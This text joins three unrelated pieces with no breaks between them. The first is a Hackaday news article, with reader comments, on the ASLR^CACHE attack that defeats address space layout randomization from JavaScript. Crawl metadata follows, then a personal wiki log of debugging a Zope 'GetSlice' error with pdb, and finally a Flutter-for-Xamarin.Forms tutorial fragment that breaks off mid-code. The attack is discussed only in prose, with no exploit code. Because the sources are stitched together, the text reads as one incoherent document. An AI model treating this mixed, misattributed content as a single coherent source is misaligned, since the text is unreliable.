Researchers. Address Space Layout Randomization or ASLR is an important defense mechanism that can mitigate known and, most importantly, unknown security flaws. ASLR makes it harder for a malicious program to compromise a system by, as the name implies, randomizing the process addresses when the main program is launched. This means that it is unlikely to reliably jump to a particular exploited function in memory or some piece of shellcode planted by an attacker. Breaking ASLR is a huge step towards simplifying an exploit and making it more reliable. Being able to do it from within JavaScript means that an exploit using this technique can defeat web browser ASLR protection running JavaScript, the most common configuration for Internet users. ASLR have been broken before in some particular scenarios but this new attack highlights a more profound problem. Since it exploits the way that the memory management unit (MMU) of modern processors uses the cache hierarchy of the processor in order to improve the performance of page table walks, this means that the flaw is in the hardware itself, not the software that is running. There are some steps that the software vendors can take to try to mitigate this issue but a full and proper fix will mean replacing or upgrading hardware itself. In their paper, researchers reached a dramatic conclusion: “… The conclusion is that such caching behavior and strong address space randomization are mutually exclusive. a first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block.” All the details can be consulted in the research team’s paper. Meanwhile, they left us some videos of demo attacks on the ASLR. The fastest one took only 25 seconds: 45 thoughts on “ASLR^CACHE Attack Defeats Address Space Layout Randomization” ASLR was only ever a band-aid on top of the wound that is shoddy programming, and all this talk of replacing hardware to fix it is missing the point. Perhaps now software vendors – especially the browser makers – can be convinced to focus a little more on their software’s integrity instead of rushing out the next cool feature-du-jour. I can dream, can’t I? Sad to think software security is becoming enough of concern for everyday users that software vendors will eventually have to start boasting it as a feature instead of a priority, provided they can actually back up their marketing claims. Hopefully SecOps researchers can continue to help keep these companies honest with their reports. dream on freind… I think that in principle what you’re talking about makes some sense. But in practice, mistakes happen even in projects that don’t include “shoddy programming”. For this reason, we need multiple tiers protecting against the most common types of exploits (buffer overflows for example). This was one of those layers and this shows a weak spot in that defense. ASLR is not a protection, it is obfuscation. Security by obscurity NEVER works. And what is a password? a level of authentication. unrelated to code integrity. no matter how hard you dig into a disassembled binary, you wont magically find the users password. ASLR is also unrelated to code integrity. How do you suggest code integrity stops someone detecting cache misses? Anybody with that position have no freaking clue about security. When a security analyst say that security by obscurity should be avoided they mean that a system _only_ being protected by obscurity should be avoided, best practices for highly secure data/installations etc. includes obscurity as a valid protective element. IOW learn about security instead of spouting out sound bites. Exactly, ultimately any hidden detail such as passwords, game plans, network layout is security by obscurity. It’d be foolhardy to give any of those away. Valid is a strong word. Obscurity only prolongs the inevitable. And Peter, passwords are not obscurity, unless some dingus hard-coded one. They are a form of authentication. How often do you use one letter passwords? Something that can be reliably bruteforced (not even mentioning actual clever bypasses) is a duct tape of security. Well Mozilla is going at it pretty hard with Rust’s memory safety. Every heard of the Swiss chess model of security? It’s impossible to make an impenetrable barrier, we need things like ASLR, NX and stack protection not because they are perfect but because nothing will ever be perfect. Anything that can be defeated so readily is nothing at all. You clearly have no idea what you’re talking about if you are reducing this wonderful attack to “nothing at all”. I don’t reduce the attack, I reduce the protection. Something defeated is not a link in a chain of protection as you seem to imply. It’s like saying ‘my house has multiple layers of protection because first there is the air you need to pass through to get to the door…’ @Whatnot: No it is like your house have multiple layers of protection because first you have to enter a locked gate, then enter the maze and after passing through it your door. And don’t forget to disable the silent alarm.. its not the first ASLR attack ever, its the first one(?) demonstrated running reliably inside javascript virtual machine. Once AES is broken it becomes nothing in terms of encryption, seems simple. @Whatnot: regarding “broken AES”: The question would remain, if it would be broken by 3 months of computation by the combined server power of the NSA or by a school kid’s gaming PC in e.g. one day. Mostly any lock can be defeated, it is just a question of time. Is AES likely to be broken? I think mathematically it’s unlikely, we can chip away at it reducing the effective security in bits. But breaking it? Only if we ever work out how to unscramble an egg.. No, it’s not inevitable. If there is a flaw in the design of AES that can be exploited, yes, it will be found sooner or later. But if there is no such flaw, AES with 256 Bit will not be broken. Why? There is a minimum amount of energy necessary to flip a bit. The complete energy the sun can provide until it burns out is not enough to run a simple 256 bit counter through all possible states and AES is more complicated than a simple counter. The swiss cheese model applies to natural, random problems. It fails badly in the face of willful attackers. Software security is made by creating impenetrable barriers. There is no other way, as attacks are too cheap to be deterred by permissive ones. There is no perfect, flawless code possible. Therefore I see this ASLR more like a helmet. Of course it should not be like with some people starting to wear a helmet for skiing and then going much faster than before, because they feel too safe and over assured. Harvard architecture? If data and programs are in separate places, would that help mitigate these things? Program-to-program branches would still be possible, but you can’t use buffer overflow to inject a program. I don’t know enough about this to know whether this makes sense. NX does this for modern machines. It marks data as “none executable”. But, as always, there are ways around it. And modern javascript engines use “just in time” compiling, meaning they need to write new program code on the fly. So it generates data and then makes it executable. @Luke: Short version: you can’t change the code in a Harvard arch, but if you’re able to chain bits of pre-existing code (“gadgets” in the lingo) together into something useful, you can still run your own programs. If you can defeat it with JavaScript then JavaScript has too many functions and it’s a flaw of JavaScript I would think. Why does JavaScript has so much capability to defeat all and any protection of anything anyway? Did the freaking NSA sponsor it? It’s a remarkable attack to achieve in javascript. but really its more to do with the excellent javascript performance we have these days than a feature. We need something line javascript and we need it to be performant. So what should we do? Make the functionality reflect where it’s used is what they should do. Same with other web plugins incidentally, which all have a long history of seemingly adding functions who’s primary use is to support hackers for some reason. The problem is that the capabilities necessary to do useful things are also the capabilities necessary to produce a hack. You’re suggestion is like saying that nobody should have knives in their kitchen because they might be used to hurt people. JavaScript isn’t an excellent performer; hardware, bandwidth and massive libraries have simply made javascript’s lousy performance less of an issue. It’s honestly really fucking good. Really, REALLY good. Seriously JavaScript is no longer a joke. I didn’t really believe it since last time I actually used it was IE6 days where it was still being interpreted, recently I’ve been using it (admittedly more via clojurescript) but JIT version performance is amazing. Great now people can hack you in less than a millisecond, good for the hackers and spooks and advertisers since they probably want to hack in bulk and a million people times a second is months of waiting. 1) Number crunching performance tests are no real benchmark for real world performance. As number crunching is very good to optimize with a JIT. It’s an area where on some tests JIT languages outperform C code. 2) The nes was emulated already on a 40Mhz 486. So that just shows that javascript is up to speed with a 486. 3) Just a variation on 1. But in the end, performance usually does not even matter. As 90% of your execution time is spend in 10% of your code. Making sure your code in maintainable is much more important. And if it is slow, find that 10% and fix that. I’m just glad that they are fixing the language. Proper syntax for classes is really welcome for example: (I write 80% of my code in python. Which isn’t fast. And it’s not important that it isn’t fast) @daid303 If you’re not happy with benchmarks, and you’re not happy with real world performance and you’re not happy with real life computationally intensive applications. Then what do you base your idea of performance no? Javascript has it’s shortcommings in syntax and lack of namespaces. But between google closure, and the new JIT engines (like v8) the performance is amazing for well written code (as always you need good code). It certainly outperforms python + pygame (I think that’s SDL1.1 accelerated) when you combine html5 and js in a modern browser. @daid303 The NES was emulated *badly* on a 40MHz 486, with massive amounts of accuracy bugs. Cycle-accurate emulation of the NES requires closer to a 1GHz x86 CPU. But don’t let facts stop you from spreading your ignorant drivel. If you actually looked into modern js performance you would be impressed. That’s true for the performance AFTER the initial compilation, but now look at the startup time and the memory footprint of your application, especially if it run on a small embedded device. Compiled C code still have a long long life on small embedded devices. @Whatnot I’m getting the impression you don’t actually know much about javascript or programming. This is why the industry should of skipped NX and ASLR and cookies and other stuff and went to sandboxing a long time ago.. Sandboxing is far easier to do and all you have to protect are some* APIs NX and ASLR are there to protect your sandbox, not to replace it.
https://hackaday.com/2017/02/15/aslrcache-attack-defeats-address-space-layout-randomization/
CC-MAIN-2019-18
refinedweb
1,999
64.1
io_wrapper_open_memory Name io_wrapper_open_memory — Open a read-only handle on some memory Synopsis #include "io_wrapper.h" io_object * **io_wrapper_open read-only handle on some memory. - blob start of the memory area - len size of the area in bytes - memtype type of memory If memtype is MEMTYPE_DONTCARE, then the memory will NOT be freed when the object is destroyed. If memtype is MEMTYPE_IS_MALLOC_3C, then the memory will be freed using free(3C). If memtype is MEMTYPE_IS_MMAP, then the memory will be released using the munmap() system call. The len parameter must match the length used to mmap() the memory. Otherwise, memtype is one of the MEMTYPE constants defined in memory.h
https://support.sparkpost.com/momentum/3/3-api/apis-io-wrapper-open-memory
CC-MAIN-2022-21
refinedweb
108
56.55
Hello! I am constantly seeing UBD I/O operation mismatch panic in UML with 2.5 SMP (on smp host). Reproducing is simple - just run uml on SMP host (dual cpu in my case), SMP uml with four CPUs, single ubd with ext2 on it and copy 2 kernel sources from one place to another (single fs) (cp -a /tmp/linux* /mnt/ in my case). And it will die with big probability. If it does not - remove new copies of kernels, shutdown UML, start it again and try once more. May be there are similar problem with 2.4 UBD kernel, but I have not tried yet. The race seem to be this way: ubd_handler() at its end calls do_ubd_request() to process the request if there is any on the queue. Also there is do_ubd variable that is used as a lock to protect against each request to be processed more than once. But if the queue was empty now we called do_ubd_request() from ubd_handler, then on the other CPU another thread added erquest to the queue at the same time before do_ubd was set in first do_ubd_request() invocation (and this first do_ubd_request() already seen that list is not empty already). So we have two do_ubd_requests working, but when second gets to execution, the head of the queue list is changed and we get the panic). I fixed that by changing to atomic bit opeartions to guard against that situation. And this fix seems to work for me. I think this is kind of right one, too. See the first patch below. Also on a sidenote - to build 2.5.44 from bk-current, you need second patch below (to arch/um/os-Linux/Makefile). Bye, Oleg ===== arch/um/drivers/ubd_kern.c 1.17 vs edited ===== --- 1.17/arch/um/drivers/ubd_kern.c Mon Oct 21 11:16:57 2002 +++ edited/arch/um/drivers/ubd_kern.c Wed Oct 30 18:14:09 2002 @@ -29,6 +29,7 @@ #include "linux/blkpg.h" #include "linux/genhd.h" #include "linux/spinlock.h" +#include "linux/bitops.h" #include "asm/segment.h" #include "asm/uaccess.h" #include "asm/irq.h" @@ -48,7 +49,10 @@ static spinlock_t ubd_io_lock = SPIN_LOCK_UNLOCKED; static spinlock_t ubd_lock = SPIN_LOCK_UNLOCKED; -static void (*do_ubd)(void); +/* We set this when we asked io thread to do some work, + by using this flag we can avoid do_ubd_request to schedule + io more then once for any given request. (race seen on SMP) */ +static long ubd_servicing; static int ubd_open(struct inode * inode, struct file * filp); static int ubd_release(struct inode * inode, struct file * file); @@ -374,7 +378,6 @@ struct request *rq = elv_next_request(&ubd_queue); int n; - do_ubd = NULL; intr_count++; n = read_ubd_fs(thread_fd, &req, sizeof(req)); if(n != sizeof(req)){ @@ -383,6 +386,7 @@ spin_lock(&ubd_io_lock); end_request(rq, 0); spin_unlock(&ubd_io_lock); + clear_bit(1, &ubd_servicing); return; } @@ -391,6 +395,7 @@ panic("I/O op mismatch"); ubd_finish(rq, req.error); + clear_bit(1, &ubd_servicing); reactivate_fd(thread_fd, UBD_IRQ); do_ubd_request(&ubd_queue); } @@ -829,16 +834,21 @@ } } else { - if(do_ubd || list_empty(&q->queue_head)) return; + /* if there is no requests or if another thread have + already started async io - return */ + if(list_empty(&q->queue_head) || + test_and_set_bit(1, &ubd_servicing)) return; + req = elv_next_request(q); err = prepare_request(req, &io_req); if(!err){ - do_ubd = ubd_handler; n = write_ubd_fs(thread_fd, (char *) &io_req, sizeof(io_req)); if(n != sizeof(io_req)) printk("write to io thread failed, " "errno = %d\n", -n); + } else { + clear_bit(1, &ubd_servicing); } } } # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.808.1.7 -> 1.808.1.8 # arch/um/os-Linux/Makefile 1.2 -> 1.3 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 02/10/29 green@... 1.808.1.8 # Makefile: # Prepend filenames with path, as needed by current build scheme. # -------------------------------------------- # diff -Nru a/arch/um/os-Linux/Makefile b/arch/um/os-Linux/Makefile --- a/arch/um/os-Linux/Makefile Wed Oct 30 18:39:06 2002 +++ b/arch/um/os-Linux/Makefile Wed Oct 30 18:39:06 2002 @@ -4,10 +4,11 @@ # obj-y = file.o process.o tty.o +USER_OBJS := $(foreach file,$(obj-y),arch/um/os-Linux/$(file)) include $(TOPDIR)/Rules.make -$(obj-y) : %.o: %.c +$(USER_OBJS) : %.o: %.c $(CC) $(CFLAGS_$@) $(USER_CFLAGS) -c -o $@ $< clean :
http://sourceforge.net/p/user-mode-linux/mailman/user-mode-linux-devel/thread/20021030184149.A13381@namesys.com/
CC-MAIN-2015-35
refinedweb
714
66.03
I'm trying to make a small program that gives you the average age of your whole family. I'm into arrays in my book, and I'm trying to experiment with stuff. My thoughts behind the program are this.... 1. Get total number of family members. 2. get ages of all the members and insert it into an array. 3. Total up all the ages inside the array and insert that total into a new variable. 4. Send the two variables to a function do the actual averaging and post a witty comment. Code://This is going to be a practice program that averages the age of your family #include <iostream> using namespace std; /* familyfunct is supposed to take the 2 variables from the main function, divide them into a third variable average. then run a series of if loops dependant on averages number. */ int familyfunct(int combinedages, int famtot, int average){ cout<<"About to do the math.....\n\n\n"; average = (combinedages/famtot); cout<< average << endl; if(average>80){ cout<<"You're all old!"; } if(average< 20){ cout<<"You're a young family!"; } if(average< 30){ cout<<"You're getting older!"; } else{ cout<<"You're pretty normal"; } } int main(){ int ages[100]; //this array holds the ages of all family members up to 100 people. int FamiTotal, AverAge; int i; //for for loop cout<< "How many family members do you have?"; cin>>FamiTotal; cout<<"Enter each family members age. Press enter when complete."; cin>>ages[]; //this is supposed to insert each family member into the ages[] array /* This for loop is supposed to extract the data from the array ages[] then add them all up. This is the main problem of the program. */ for(i=0; i<100; i++){ AverAge= ages[i]+ ages[i]; } familyfunct(AverAge, FamiTotal); // sends AverAge and FamiTotal return 0; } Here is what I came up with. I'm new to arrays, and my book doesn't seem to go too much into them right now, so I'm experimenting. The bolded area of my code is the area that I need help on. How do I extract the list of numbers from my array and then add them up to put that total into a new variable? I figured it'd be some type of for loop, but I don't really know. Secondly, I'm getting some compiler errors that seem unrelated to array issue I'm having. Can't quite figure them out, but here they area... Code:C:\Users\justin\C++\My Code\arrays1.cpp||In function 'int main()':| C:\Users\justin\C++\My Code\arrays1.cpp|43|error: expected primary-expression before ']' token| C:\Users\justin\C++\My Code\arrays1.cpp|10|error: too few arguments to function 'int familyfunct(int, int, int)'| C:\Users\justin\C++\My Code\arrays1.cpp|50|error: at this point in file| ||=== Build finished: 3 errors, 0 warnings ===| Well, any help is appreciated! This program is just me experimenting since I'm a self learner. I don't really have anyone to go to but you guys and my pdf.
https://cboard.cprogramming.com/cplusplus-programming/127718-pulling-data-array.html
CC-MAIN-2017-04
refinedweb
516
65.93
Zope GetSlice Bug Problem: One solution: tested that URL is a string --BillSeitz, 2003/06/25 17:17 GMT shows:: URL '' Test case to focus on --BillSeitz, 2003/07/01 18:12 GMT Most obvious in just trying to list the wiki contents, but since that's horribly long let's try something simpler. will be the page I try to get to. So I need to figure out how to stop before the 'eval' to look at the values of the params. trying to debug --BillSeitz, 2003/07/04 13:14 GMT per < And Debugging.stx> But after doing the import, when I try 'Z Publisher.Zope('/fluxent/webseitz/wiki/manage_propertiesForm')' it spits out a 401 (Unauthorized) response. Nothing in the docs says this will happen. I wonder if you can't use this method on ZMI URLs? trying zLOG as another approach --BillSeitz, 2003/07/15 17:22 GMT to dump values like 'action' and 'URL' - (note that Z Log dumps msg to console, not to a file (for me) which causes problems when there's too much stuf) but I keep getting error like "global name 'URL' is not defined" - |similar problem - pointing to |this - which makes it seem like I need to pass an argument somewhere, but I'm not really working at that level, so I don't know what to do, short of messing with code further up the stack (e.g. passing REQUEST into the containing method) which sounds like a bad idea. back to debug process --BillSeitz, 2003/07/15 23:21 GMT following Jul4 document, but different process - " Interactive Debugging Triggered From the Web" - insert this into *.py code where you want to set a breakpoint:: import pdb pdb.set_trace() then start up Zope normally (but with the -d flag) then request the appropriate URL from the browser - console will pop you into debugger at that breakpoint. I hope. seems to work --BillSeitz, 2003/07/16 02:32 GMT Gets into pdb. Here's pdb |docs type 'n' to skip ahead from inside of set_trace - end up at 'eval(code,d)' type 'p d' to print value of 'd' and get pile of HTML which looks like output of the dtml-request method (Jun25) trying 'p code' spits out that you have a 'type code' object - 'p str(code)' doesn't do you any good. let's move along. Try an 's' to step in. Hmmm, I just continue to get lost. It seems to loop back around to that same 'exec' over and over again - I don't know if I've already triggered the error, or if that happens later on. If I try doing 'c' it repeats something else - I think now it's generating the error traceback page. The browser gets the page eventually. If I request the page again it doesn't seem to go into pdb, I end up with some other traceback involving 'raise bdb.BdbQuit' Will try some more tomorrow. code objects --BillSeitz, 2003/07/16 02:37 GMT ah, that's a pointer to pseudo-compiled code - see here and find "code objects" have no clue how to move forward --BillSeitz, 2003/07/16 21:21 GMT Tried setting the breakpoint at various places, but I honestly have no idea what I'm even looking for. If a 3rd party isn't going to save my bacon, I need to figure out a new approach. perfect timing! --BillSeitz, 2003/07/16 21:33 GMT Jamie Heilman pointed out the problem must be from having an object named 'URL' in the folder. That's it! He suggested a code change (in 'manage_tabs.dtml'), but I just settled for removing the object. Edited: | Tweet this! | Search Twitter for discussion
http://webseitz.fluxent.com/wiki/ZopeGetSliceBug
CC-MAIN-2022-27
refinedweb
625
69.21
JAVA S/W download JAVA S/W download Hi I'm new to JAVA, I want to download JAVA S/W from where I need to download. Please help me with the link. Thank you, Hi ! u can download JAVA from platform(s/w requirements) for run jsp programs? platform(s/w requirements) for run jsp programs? in which platform jsp programms are run ; if (n != 0){ String s = oneThousand(n); str = s corejava - Java Interview Questions =1900; var maxYear=2100; function isInteger(s){ var i; for (i = 0...; } function stripCharsInBag(s, bag){ var i; var returnString = ""; // Search corejava - Java Interview Questions corejava - Java Interview Questions ://- - - - - - - -;) Meeya CoreJava - Java Beginners aut JDBC, JAVA JDBC, JAVA I want to develop a s/w that will work on a LAN, so is there any need for a server, bcoz I am using database to store information, and these information will be on LAN network admin - Security network admin i want to develop some s/w in java which can monitor various ports like 80,23,8080 etc and restrict them if necessary.. pls help hiberante installation - Hibernate hiberante installation how to install hibernate s/w in windows xp. Hi Friend, Please visit the following link: Hope that it will be helpful for you. Need the some guidence - Spring project finder description: Develop s/w to identify identical projects reports.The s/w compares a project reports with other projects to search her... manually. The s/w will generate a table to show the list of similar reports information information hello sir i installed java1.5 s/w but java editor not displaying. i wants to create a desktop icon for this application.without notepad i wants to write code in code window like c,cpp.plz help me. replay Servlets - JSP-Servlet Servlets How can we differentiate the doGet() and doPost() methods in Servlets Hi friend, Difference between doGet() and doPost() Thanks JAVA - Struts is differecne b/w RequestProcessor and RequestDispatcher? /Good_java_j2ee_interview_questions.html?s=1 Regards, Prasanth HI... for more information. java - Struts :// Thanks java - Java Interview Questions /interviewquestions/corejava.shtml I think this is enough.. but u can see http Java - Java Interview Questions link. java questions - Java Interview Questions :// Thanks MySql Absolute Value Designer | 0.587 | | 3 | ravi | s/w developer | 91.456 a interview questioon a interview questioon write a programme so the it can print each substring of a string like "saswat" is the string then it will print s,a,w,t,sa,swa,sta,as,aws,ats,sasw all posible sub string with out repeating Hi check where is error - JSP-Interview Questions = value; var obj = /^(\s*)([\W\w]*)(\b\s*$)/; if (obj.test(temp)) { temp... = /^(\s*)([\W\w]*)(\b\s*$)/; if (obj.test(temp)) { temp = temp.replace(obj composinte primary key in hibernate primary key with all the columns of the table and hibernate s/w has created two pojo MySQL Absolute Value | | 3 | ravi | s/w developer | 91.456 quesion - MobileApplications with wapkit and please provide me necessary s/w and instructions how and where i should Factorial Program in Java "); } } } Output C:\Documents and Settings\bharat\Desktop\bipul\CoreJava\Swing Example...\bipul\CoreJava\Swing Example\Factorial> java Factorial1 enter URL validation in JavaScript . The regular expression "http(s)?://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)?"...;url').value; if(http(s)?://([\w-]+\.)+[\w-]+(/[\w- ./?%& :// Oracle Tutorial -autonomous S/W sub-systems Automatic Workload Repository (AWR) Data java - Java Beginners /interviewquestions/corejava.shtml Oracle Tutorial include the various semi-autonomous S/W sub-systems. Active Session History (ASH Hibernate Tutorials Hibernate Tutorials Deepak Kumar Deepak Kumar is specialized in J2EE technologies, having 6+ years of experience in the S/W field. His current interests and expertise involves the design Interthread Communication in Java . This tells the Consumer that it should now remove it. package corejava JAXB Create XML File And Get Data From XML how to create XML file and how to convert XML file's data to Java Object... { File file = new File("C:\\Documents and Settings\\bharat\\Desktop\\bipul\\CoreJava... File("C:\\Documents and Settings\\bharat\\Desktop\\bipul\\CoreJava Java questionnaire :/ Or If you want to go help me in these - Java Interview Questions use the corejava.* Hi Friend, 1) import java.util.*; public class... boolean isPalindrome (String s) { int low, high; low = 0; high = s.length()-1 Classroom, Online and Onsite IT Training . These Online, Classroom and Onsite Training are good for the fresher's... rehearsals through our website The top Error during runtime NoClassDefFound in java ]); x = y = 0.75 * s; w = -0.4375 * s * s...) { s = (y - x) / 2.0; s = s * s + w...; } s = x - w / ((y - x) / 2.0 + s); for (int i = low Pattern,Matcher,Formatter and Scanner classes for matching (limited to: . (dot), * (star), + (plus), ?, \d, \s, \w, [], ()). 4. Code...;; Scanner s = new Scanner(input); s.findInLine("(\\d+) fish (\\d+) fish (\\w..., %s) in format strings. The Java 2 Platform, Standard Edition (J2SE), version Advertisements If you enjoyed this post then why not add us on Google+? Add us to your Circles
http://roseindia.net/tutorialhelp/comment/26587
CC-MAIN-2016-07
refinedweb
842
50.33
Created on 2020-04-14 22:30 by vstinner, last changed 2020-05-05 05:52 by rhettinger. This issue is now closed. The random module lacks a getrandbytes() method which leads developers to be creative how to generate bytes: It's a common use request: * bpo-13396 in 2011 * bpo-27096 in 2016 * in 2020 Python already has three functions to generate random bytes: * os.getrandom(): specific to Linux, not portable * os.urandom() * secrets.token_bytes() These 3 functions are based on system entropy and they block on Linux until the kernel collected enough entropy: PEP 524. While many users are fine with these functions, there are also use cases for simulation where the security doesn't matter, and it's more about being able to get reproducible experience from a seed. That's what random.Random is about. The numpy module provides numpy.random.bytes(length) function for such use case: One example can be to generate UUID4 with the ability to reproduce the random UUID from a seed for testing purpose, or to get reproducible behavior. Attached PR implements the getrandbytes() method. If we have to have this, the method name should be differentiated from getrandbits() because the latter returns an integer. I suggest just random.bytes(n), the same as numpy. > Python already has three functions to generate random bytes: Now, there will be four ;-) > I suggest just random.bytes(n), the same as numpy. The problem with this is that people who `from random import *` (some schools insist on this, probably because most functions they need already start with `rand`) will shadow builtin `bytes`. Not that those schools do anything with `bytes`, but still, it might be inconvenient. (The metaproblem is of course that some functions already do the "poor man's namespacing" in C-style by starting with `rand`, and some don't. I'm always for user control of namespacing, but I'm just saying that it doesn't correspond to how many beginners use `random` module.) Do you have another name suggestion that doesn't have a parallelism problem with the existing name? The names getrandbytes() and getrandbits() suggest a parallelism that is incorrect. I think that the "module owner";-P must decide whether the `random` module should follow the C-namespacing or not. Of course, I'm in the "not" camp, so I believe those two "rand..." functions (randrange is completely redundant with random.choice(range)) should be supplemented with random.int and random.float. And then random.bytes will be completely natural. And people might be gently nudged into the right direction when using Python module namespaces. I concur that bytes() isn't a good name, but am still concerned that the proposed name is a bad API decision. Maybe randbytes()? I like "from random import randbytes" name. I concur that "from random import bytes" overrides bytes() builtin type and so can likely cause troubles. I updated my PR to rename the method to randbytes(). The performance of the new method is not my first motivation. My first motivation is to avoid consumers of the random to write a wrong implementation which would be biased. It's too easy to write biased functions without notifying. Moreover, it seems like we can do something to get reproducible behavior on different architectures (different endianness) which would also be a nice feature. For example, in bpo-13396, Amaury found this two functions in the wild: * struct.pack("Q", random.getrandbits(64)) * sha1(str(random.getrandbits(8*20))).digest() As I wrote, users are creative to workaround missing features :-) I don't think that these two implementations give the same result on big and little endian. All Random methods give the same result independently of endianess and bitness of the platform. > I don't think that these two implementations give the same result on big and little endian. The second one does. I wrote a quick benchmark: --- import pyperf import random gen = random.Random() # gen = random.SystemRandom() gen.seed(850779834) if 1: #hasattr(gen, 'randbytes'): func = type(gen).randbytes elif 0: def py_randbytes(gen, n): data = bytearray(n) i = 0 while i < n: chunk = 4 word = gen.getrandbits(32) word = word.to_bytes(4, 'big') chunk = min(n, 4) data[i:i+chunk] = word[:chunk] i += chunk return bytes(data) func = py_randbytes else: def getrandbits_to_bytes(gen, n): return gen.getrandbits(n * 8).to_bytes(n, 'little') func = getrandbits_to_bytes runner = pyperf.Runner() for nbytes in (1, 4, 16, 1024, 1024 * 1024): runner.bench_func(f'randbytes({nbytes})', func, gen, nbytes) --- Results on Linux using gcc -O3 (without LTO or PGO) using the C randbytes() implementation as the reference: +--------------------+-------------+----------------------------------+-------------------------------+ | Benchmark | c_randbytes | py_randbytes | getrandbits_to_bytes | +====================+=============+==================================+===============================+ | randbytes(1) | 71.4 ns | 1.04 us: 14.51x slower (+1351%) | 244 ns: 3.42x slower (+242%) | +--------------------+-------------+----------------------------------+-------------------------------+ | randbytes(4) | 71.4 ns | 1.03 us: 14.48x slower (+1348%) | 261 ns: 3.66x slower (+266%) | +--------------------+-------------+----------------------------------+-------------------------------+ | randbytes(16) | 81.9 ns | 3.07 us: 37.51x slower (+3651%) | 321 ns: 3.92x slower (+292%) | +--------------------+-------------+----------------------------------+-------------------------------+ | randbytes(1024) | 1.05 us | 173 us: 165.41x slower (+16441%) | 3.66 us: 3.49x slower (+249%) | +--------------------+-------------+----------------------------------+-------------------------------+ | randbytes(1048576) | 955 us | 187 ms: 196.30x slower (+19530%) | 4.37 ms: 4.58x slower (+358%) | +--------------------+-------------+----------------------------------+-------------------------------+ * c_randbytes: PR 19527, randbytes() methods implemented in C * py_randbytes: bytearray, getrandbits(), .to_bytes() * getrandbits_to_bytes: Serhiy's implementation: gen.getrandbits(n * 8).to_bytes(n, 'little') So well, the C randbytes() implementation is always the fastest. random.SystemRandom().randbytes() (os.urandom(n)) performance using random.Random().randbytes() (Mersenne Twister) as a reference: +--------------------+-------------+---------------------------------+ | Benchmark | c_randbytes | systemrandom | +====================+=============+=================================+ | randbytes(1) | 71.4 ns | 994 ns: 13.93x slower (+1293%) | +--------------------+-------------+---------------------------------+ | randbytes(4) | 71.4 ns | 1.04 us: 14.60x slower (+1360%) | +--------------------+-------------+---------------------------------+ | randbytes(16) | 81.9 ns | 1.02 us: 12.49x slower (+1149%) | +--------------------+-------------+---------------------------------+ | randbytes(1024) | 1.05 us | 6.22 us: 5.93x slower (+493%) | +--------------------+-------------+---------------------------------+ | randbytes(1048576) | 955 us | 5.64 ms: 5.91x slower (+491%) | +--------------------+-------------+---------------------------------+ os.urandom() is way slower than Mersenne Twister. Well, that's not surprising: os.urandom() requires at least one syscall (getrandom() syscall on my Linux machine). New changeset 9f5fe7910f4a1bf5a425837d4915e332b945eb7b by Victor Stinner in branch 'master': bpo-40286: Add randbytes() method to random.Random (GH-19527) New changeset 223221b290db00ca1042c77103efcbc072f29c90 by Serhiy Storchaka in branch 'master': bpo-40286: Makes simpler the relation between randbytes() and getrandbits() (GH-19574) New changeset 87502ddd710eb1f030b8ff5a60b05becea3f474f by Victor Stinner in branch 'master': bpo-40286: Use random.randbytes() in tests (GH-19575) The randbytes() method needs to depend on genrandbits(). It is documented that custom generators can supply there own random() and genrandbits() methods and expect that the other downstream generators all follow. See the attached example which demonstrates that randbytes() bypasses this framework pattern.. Also, please don't change the name of the genrand_int32() function. It was a goal to change as little as possible from the official, standard version of the C code at . For the most part, we just want to wrap that code for Python bindings, but not modify it. Direct link to MT code that I would like to leave mostly unmodified: When a new method gets added to a module, it should happen in a way that is in harmony with the module's design. I created bpo-40346: "Redesign random.Random class inheritance". $ ./python -m timeit -s 'import random' 'random.randbytes(10**6)' 200 loops, best of 5: 1.36 msec per loop $ ./python -m timeit -s 'import random' 'random.getrandbits(10**6*8).to_bytes(10**6, "little")' 50 loops, best of 5: 6.31 msec per loop The Python implementation is only 5 times slower than the C implementation. I am fine with implementing randbytes() in Python. This would automatically make it depending on the getrandbits() implementation. Raymond: >. I don't see how 30 lines makes Python so harder to maintain. These lines make the function 4x to 5x faster. We are not talking about 5% or 10% faster. I think that such optimization is worth it. When did we decide to stop optimizing Python? Raymond: > The randbytes() method needs to depend on genrandbits(). I created bpo-40346: "Redesign random.Random class inheritance" for a more generic fix, not just randbytes(). Raymond: > Also, please don't change the name of the genrand_int32() function. It was a goal to change as little as possible from the official, standard version of the C code at . This code was already modified to replace "unsigned long" with "uint32_t" for example. I don't think that renaming genrand_int32() to genrand_uint32() makes the code impossible to maintain. Moreover, it seems like was not updated for 13 years. Raymond: > The randbytes() method needs to depend on genrandbits(). I created PR 19700 which allows to keep the optimization (C implementation in _randommodule.c) and Random subclasses implement randbytes() with getrandbits(). New changeset 2d8757758d0d75882fef0fe0e3c74c4756b3e81e by Victor Stinner in branch 'master': bpo-40286: Remove C implementation of Random.randbytes() (GH-19797) It removed the C implementation of randbytes(): it was the root issue which started discussions here and in bpo-40346. I rejected bpo-40346 (BaseRandom) and related PRs. I close the issue. New changeset f01d1be97d740ea0369379ca305646a26694236e by Raymond Hettinger in branch 'master': bpo-40286: Put methods in correct sections. Add security notice to use secrets for session tokens. (GH-19870)
https://bugs.python.org/issue40286
CC-MAIN-2020-45
refinedweb
1,522
61.12
Project setup How does the app start? For each platform in Xamarin.Forms, you call the LoadApplication method, which creates a new application and starts your app. LoadApplication(new App()); In Flutter, the default main entry point is main where you load your Flutter app. void main() { runApp(new MyApp()); } In Xamarin.Forms, you assign a Page to the Application class. public class App: Application { public App() { MainPage = new ContentPage() { new Label() { Text="Hello World", HorizontalOptions = LayoutOptions.Center, VerticalOptions = LayoutOptions.Center } }; } } In Flutter, “everything is a widget”, even the application itself. The following example shows MyApp, a simple application Widget. class MyApp extends StatelessWidget { // This widget is the root of your application. @override Widget build(BuildContext context) { return new Center( child: Text("Hello World!", textDirection: TextDirection.ltr)); } } How do you create a page? Xamarin.Forms has many different types of pages; ContentPage is the most common. In Flutter, you specify an application widget that holds your root page. You can use a MaterialApp widget, which supports Material Design, or you can use a CupertinoApp widget, which supports an iOS-style app, or you can use the lower level WidgetsApp, which you can customize in any way you want. The following code defines the home page, a stateful widget. In Flutter, all widgets are immutable, but two types of widgets are supported: stateful and stateless. Examples of a stateless widget are titles, icons, or images. The following example uses MaterialApp, which holds its root page in the home property. class MyApp extends StatelessWidget { // This widget is the root of your application. @override Widget 